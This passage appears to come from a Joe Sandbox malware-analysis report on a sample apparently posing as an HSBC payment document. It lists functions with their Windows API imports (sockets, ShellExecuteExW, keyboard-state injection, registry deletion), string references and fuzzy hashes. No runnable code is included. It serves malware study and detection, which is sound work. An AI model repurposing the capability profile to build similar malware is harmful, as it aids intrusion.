Instruction ID: 062e094b14f6f520f88efdf8a2ec48a614d36021d531f8a6d0d7d4c6f0dd8f25
Opcode Fuzzy Hash: 918610b3deaa1600c4527eacbfcfcfaed66ca2dc37dce203f1fa212414b3edbe
Instruction Fuzzy Hash: F9314F72101214BFEB118F50CC8AFEB3BA9FF8A765F084165FE089A191D6799C41CB64

Function 0077BBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0077BBC4
_memcmp.LIBCMT ref: 0077BBE6
_memcmp.LIBCMT ref: 0077BBFE
_memcmp.LIBCMT ref: 0077BC11
_memcmp.LIBCMT ref: 0077BC2B
_memcmp.LIBCMT ref: 0077BC3E
_memcmp.LIBCMT ref: 0077BC56
_memcmp.LIBCMT ref: 0077BC71

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: c6eb913fe1bf391183cfb762108917c73995103fe395adaca6c253597fc4df0e
Instruction ID: a894aee07aba7a0f4acf5801766383490425761adf641e2ef3b6c444cbef9eb9
Opcode Fuzzy Hash: c6eb913fe1bf391183cfb762108917c73995103fe395adaca6c253597fc4df0e
Instruction Fuzzy Hash: 7D21A1E1702205BBAA057625DD52FFB775D9E103C8F88C020FD0896A57FB6CDE2682B1

Function 0078EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00729837: __itow.LIBCMT ref: 00729862
Part of subcall function 00729837: __swprintf.LIBCMT ref: 007298AC

Part of subcall function 0073FC86: _wcscpy.LIBCMT ref: 0073FCA9

_wcstok.LIBCMT ref: 0078EC94
_wcscpy.LIBCMT ref: 0078ED23
_memset.LIBCMT ref: 0078ED56

Strings

X, xrefs: 0078ED93

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 0bee63c50001f68160ad4df2a255bca2f11ec548f57153ccfc7168449600291c
Instruction ID: 44f2fde0a902581a8d9bebf5ef4e7978211287c1b7bd0fd68607b1a1477d6c3f
Opcode Fuzzy Hash: 0bee63c50001f68160ad4df2a255bca2f11ec548f57153ccfc7168449600291c
Instruction Fuzzy Hash: 88C19C71608710DFC754EF24D889A6AB7E4FF85310F04492DF9999B2A2DB38EC45CB92

Function 00796B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00796C00
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00796C21
WSAGetLastError.WSOCK32(00000000), ref: 00796C34
htons.WSOCK32(?,?,?,00000000,?), ref: 00796CEA
inet_ntoa.WSOCK32(?), ref: 00796CA7

Part of subcall function 0077A7E9: _strlen.LIBCMT ref: 0077A7F3
Part of subcall function 0077A7E9: _memmove.LIBCMT ref: 0077A815

_strlen.LIBCMT ref: 00796D44
_memmove.LIBCMT ref: 00796DAD

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 742aa569f086c4be90f04a8c17245e9d3957630aad6edad8cfdd12038512c1ff
Instruction ID: c946a9f3231f59cdc69475be8a47520cecd553ea83f53f5a1543cd79797b7169
Opcode Fuzzy Hash: 742aa569f086c4be90f04a8c17245e9d3957630aad6edad8cfdd12038512c1ff
Instruction Fuzzy Hash: A381E471204310EBDB10EF24EC89E6AB7E8AF84714F548A1CF5559B292DB78ED04CB91

Function 00721424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e545a8a09eb64da0db2bcc4ce7307df38d775e7cde37c2fca618592e889a68f6
Instruction ID: 00457b2ff26d8837ef51fc63d8cf0ca601f58c270b2e59defbd75d40547775b7
Opcode Fuzzy Hash: e545a8a09eb64da0db2bcc4ce7307df38d775e7cde37c2fca618592e889a68f6
Instruction Fuzzy Hash: 0E717C30900119EFCB04DF98DC89ABFBB79FF99310F648159F915AA251C738AA51CFA4

Function 007AB351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(011950C0), ref: 007AB3EB
IsWindowEnabled.USER32(011950C0), ref: 007AB3F7
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 007AB4DB
SendMessageW.USER32(011950C0,000000B0,?,?), ref: 007AB512
IsDlgButtonChecked.USER32(?,?), ref: 007AB54F
GetWindowLongW.USER32(011950C0,000000EC), ref: 007AB571
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 007AB589

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: ef34f7f1fb1bdadca2df5111aa82b65e5138ff89db5ad3dcd639d8af45dfc62a
Instruction ID: 04c1bf985d1c7825a3c6d0e849fd7b820a198f20cd63127e901f007f75090de9
Opcode Fuzzy Hash: ef34f7f1fb1bdadca2df5111aa82b65e5138ff89db5ad3dcd639d8af45dfc62a
Instruction Fuzzy Hash: 4871AF34605284EFDF209F95C894FBA7BB9EF8F300F148269E945972A3C739A950DB50

Function 0079F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0079F448
_memset.LIBCMT ref: 0079F511
ShellExecuteExW.SHELL32(?), ref: 0079F556

Part of subcall function 00729837: __itow.LIBCMT ref: 00729862
Part of subcall function 00729837: __swprintf.LIBCMT ref: 007298AC

Part of subcall function 0073FC86: _wcscpy.LIBCMT ref: 0073FCA9

GetProcessId.KERNEL32(00000000), ref: 0079F5CD
CloseHandle.KERNEL32(00000000), ref: 0079F5FC

Strings

@, xrefs: 0079F525

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 93fef1453c18f136150a8304a484d258b3656931ebeb8605aaf1253a8eb0bac0
Instruction ID: 380d4983941eb426828f3d20bef5508e9f48d4a53de05535905e0bdcb04d35d5
Opcode Fuzzy Hash: 93fef1453c18f136150a8304a484d258b3656931ebeb8605aaf1253a8eb0bac0
Instruction Fuzzy Hash: 6B61BE75A00629DFCF04EFA4D8859AEBBF5FF49310F188069E855AB351CB38AD41CB94

Function 00780F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00780F8C
GetKeyboardState.USER32(?), ref: 00780FA1
SetKeyboardState.USER32(?), ref: 00781002
PostMessageW.USER32(?,00000101,00000010,?), ref: 00781030
PostMessageW.USER32(?,00000101,00000011,?), ref: 0078104F
PostMessageW.USER32(?,00000101,00000012,?), ref: 00781095
PostMessageW.USER32(?,00000101,0000005B,?), ref: 007810B8

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: a8112544c6cd3abde0da2a47159f3eff734df547313a2f4241849a7704874a1c
Instruction ID: eeef7302a53de7886ab94521c515d2c041a66b13b5a79f9a66472d6152a0a462
Opcode Fuzzy Hash: a8112544c6cd3abde0da2a47159f3eff734df547313a2f4241849a7704874a1c
Instruction Fuzzy Hash: 165103A0A847D53DFB3662348C09BB6BFAD6B06300F088589E2D8858C3C29DDCDAD751

Function 00780D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00780DA5
GetKeyboardState.USER32(?), ref: 00780DBA
SetKeyboardState.USER32(?), ref: 00780E1B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00780E47
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00780E64
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00780EA8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00780EC9

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 5032f6883cb0bc7e27887208b3cf7c86c2fe46eae5e8e6706bbf3a4b0408f30d
Instruction ID: 4b7612a8f219f7129f1ca43cdce59b03cb51dad3b3772887b67acb8426916b1c
Opcode Fuzzy Hash: 5032f6883cb0bc7e27887208b3cf7c86c2fe46eae5e8e6706bbf3a4b0408f30d
Instruction Fuzzy Hash: CC51E7A06847D57DFB7267748C45B7B7EA96B06300F088889F1D4864C2D399AC9DD7A0

Function 007855FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0078560A
_wcsncpy.LIBCMT ref: 0078563F
_wcsncpy.LIBCMT ref: 00785671
_wcsncpy.LIBCMT ref: 007856A4
_wcsncpy.LIBCMT ref: 007856E6
_wcsncpy.LIBCMT ref: 00785720
_wcsncpy.LIBCMT ref: 0078574F

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: ff39da0914d5a385255870f484a0e85af6bfe27e9702924d631c21dcf9d7475b
Instruction ID: a2b63b65cd62b0df49ad9af5194dba5922f6a00cf61594e7d69676bff6cc14c8
Opcode Fuzzy Hash: ff39da0914d5a385255870f484a0e85af6bfe27e9702924d631c21dcf9d7475b
Instruction Fuzzy Hash: 85418565C50654B6CB11FBF48C4AACFB3B89F05310F508956F518E3222FB38A765C7AA

Function 0077D56C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0077D5D4
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0077D60A
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0077D61B
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0077D69D

Strings

DllGetClassObject, xrefs: 0077D610
,,{, xrefs: 0077D578

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: ,,{$DllGetClassObject
API String ID: 753597075-623769245
Opcode ID: 85cee345e9b0d373eaa557cc296730b5c8ffb6e12359dfcd1419b68e3d167f4d
Instruction ID: 48791c50f7a6760c9a5521c44842a5afd8e18f2cba530be1f2135bcbcfb84e30
Opcode Fuzzy Hash: 85cee345e9b0d373eaa557cc296730b5c8ffb6e12359dfcd1419b68e3d167f4d
Instruction Fuzzy Hash: 22413CB1600204EFDF25DF54C884A9A7BB9EF84390B15C1A9E90DDF205D7B9DD44DBA0

Function 00783671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0078466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00783697,?), ref: 0078468B

Part of subcall function 0078466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00783697,?), ref: 007846A4

lstrcmpiW.KERNEL32(?,?), ref: 007836B7
_wcscmp.LIBCMT ref: 007836D3
MoveFileW.KERNEL32(?,?), ref: 007836EB
_wcscat.LIBCMT ref: 00783733
SHFileOperationW.SHELL32(?), ref: 0078379F

Strings

\*.*, xrefs: 0078372D

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: ee1ff5301572affdee1aaf3661edef3c6fad69642d5fc144ca6a78e427a40c12
Instruction ID: 68e098d7f7c7e032b5e3a84ac5d4c711cf1977b2924136eea591cbbcf6c567c8
Opcode Fuzzy Hash: ee1ff5301572affdee1aaf3661edef3c6fad69642d5fc144ca6a78e427a40c12
Instruction Fuzzy Hash: 1641AFB1648344AAC755EF68C4459DFB7E8EF89740F40082EF49AC3251EB38D689C752

Function 007A7291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007A72AA
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007A7351
IsMenu.USER32(?), ref: 007A7369
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007A73B1
DrawMenuBar.USER32 ref: 007A73C4

Strings

0, xrefs: 007A729E

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 9d9d1939be7b7286ba468adfbe123e0cc273f2aaf3cfb80840577acd022d3255
Instruction ID: f1c28ebd31330faddcea7dcd1070d817863f2205e82c245d6ecee2b7824eccb1
Opcode Fuzzy Hash: 9d9d1939be7b7286ba468adfbe123e0cc273f2aaf3cfb80840577acd022d3255
Instruction Fuzzy Hash: FB413575A01288EFDF24DF50D884AAABBB8FF4A314F158629FD05AB250D738AD14DF50

Function 007A0FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 007A0FD4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007A0FFE
FreeLibrary.KERNEL32(00000000), ref: 007A10B5

Part of subcall function 007A0FA5: RegCloseKey.ADVAPI32(?), ref: 007A101B
Part of subcall function 007A0FA5: FreeLibrary.KERNEL32(?), ref: 007A106D
Part of subcall function 007A0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 007A1090

RegDeleteKeyW.ADVAPI32(?,?), ref: 007A1058

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 43cbdc4640a044048785753a9eedd1ee949f42c1fa18184a182fbdad4f153b78
Instruction ID: bcc08d8de1b3de0e2a94301fdf96baa4fbe0642ef3eb8f6d5fce94323c350701
Opcode Fuzzy Hash: 43cbdc4640a044048785753a9eedd1ee949f42c1fa18184a182fbdad4f153b78
Instruction Fuzzy Hash: A3311C71900109FFEB15DB90DC89AFFB7BCEF4A300F404269E501A2141EA789E859AA4

Function 007A62CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 007A62EC
GetWindowLongW.USER32(011950C0,000000F0), ref: 007A631F
GetWindowLongW.USER32(011950C0,000000F0), ref: 007A6354
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 007A6386
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 007A63B0
GetWindowLongW.USER32(00000000,000000F0), ref: 007A63C1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 007A63DB

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 01e544deec5187832cd4231942e8e198a3d26dd562ab5ed6b5814c1133cb42c3
Instruction ID: 5dd0ab784a5db7ec7a8db530742645680e7bee0c7f6e22a1702247ff79ae5b93
Opcode Fuzzy Hash: 01e544deec5187832cd4231942e8e198a3d26dd562ab5ed6b5814c1133cb42c3
Instruction Fuzzy Hash: E0313138640284EFDB20CF58DC84F5937E1FB8A714F1982A8F6118F2B2CB79A8419B55

Function 0077DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0077DB2E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0077DB54
SysAllocString.OLEAUT32(00000000), ref: 0077DB57
SysAllocString.OLEAUT32(?), ref: 0077DB75
SysFreeString.OLEAUT32(?), ref: 0077DB7E
StringFromGUID2.OLE32(?,?,00000028), ref: 0077DBA3
SysAllocString.OLEAUT32(?), ref: 0077DBB1

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: d2299d3419fef8b4e97fa0cdb0d9e9f057a732746f5764a9b01acbc97b547dd7
Instruction ID: b641803902164050ff577e65dabd9f07495fdc49f438dc17a024464cb5161da9
Opcode Fuzzy Hash: d2299d3419fef8b4e97fa0cdb0d9e9f057a732746f5764a9b01acbc97b547dd7
Instruction Fuzzy Hash: 51218676600219AFDF20DFB8DC48CBB73ACEF493A0B01C525F918DB160D6789C4187A4

Function 00796173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00797D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00797DB6

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 007961C6
WSAGetLastError.WSOCK32(00000000), ref: 007961D5
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0079620E
connect.WSOCK32(00000000,?,00000010), ref: 00796217
WSAGetLastError.WSOCK32 ref: 00796221
closesocket.WSOCK32(00000000), ref: 0079624A
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00796263

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 64fad1f2e7580eec0544b961823e8f91c86cd5e0a85d1fc1f9f8a7a20037f3b1
Instruction ID: bfe2b0083a91c01b632281c2b438dce5cf4e8282c0b12f39cb723aae090119de
Opcode Fuzzy Hash: 64fad1f2e7580eec0544b961823e8f91c86cd5e0a85d1fc1f9f8a7a20037f3b1
Instruction Fuzzy Hash: 6331B371600118AFDF10AF64EC89BBE77ADEF45760F048129FD05A7291DB78AC04CBA1

Function 0077F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

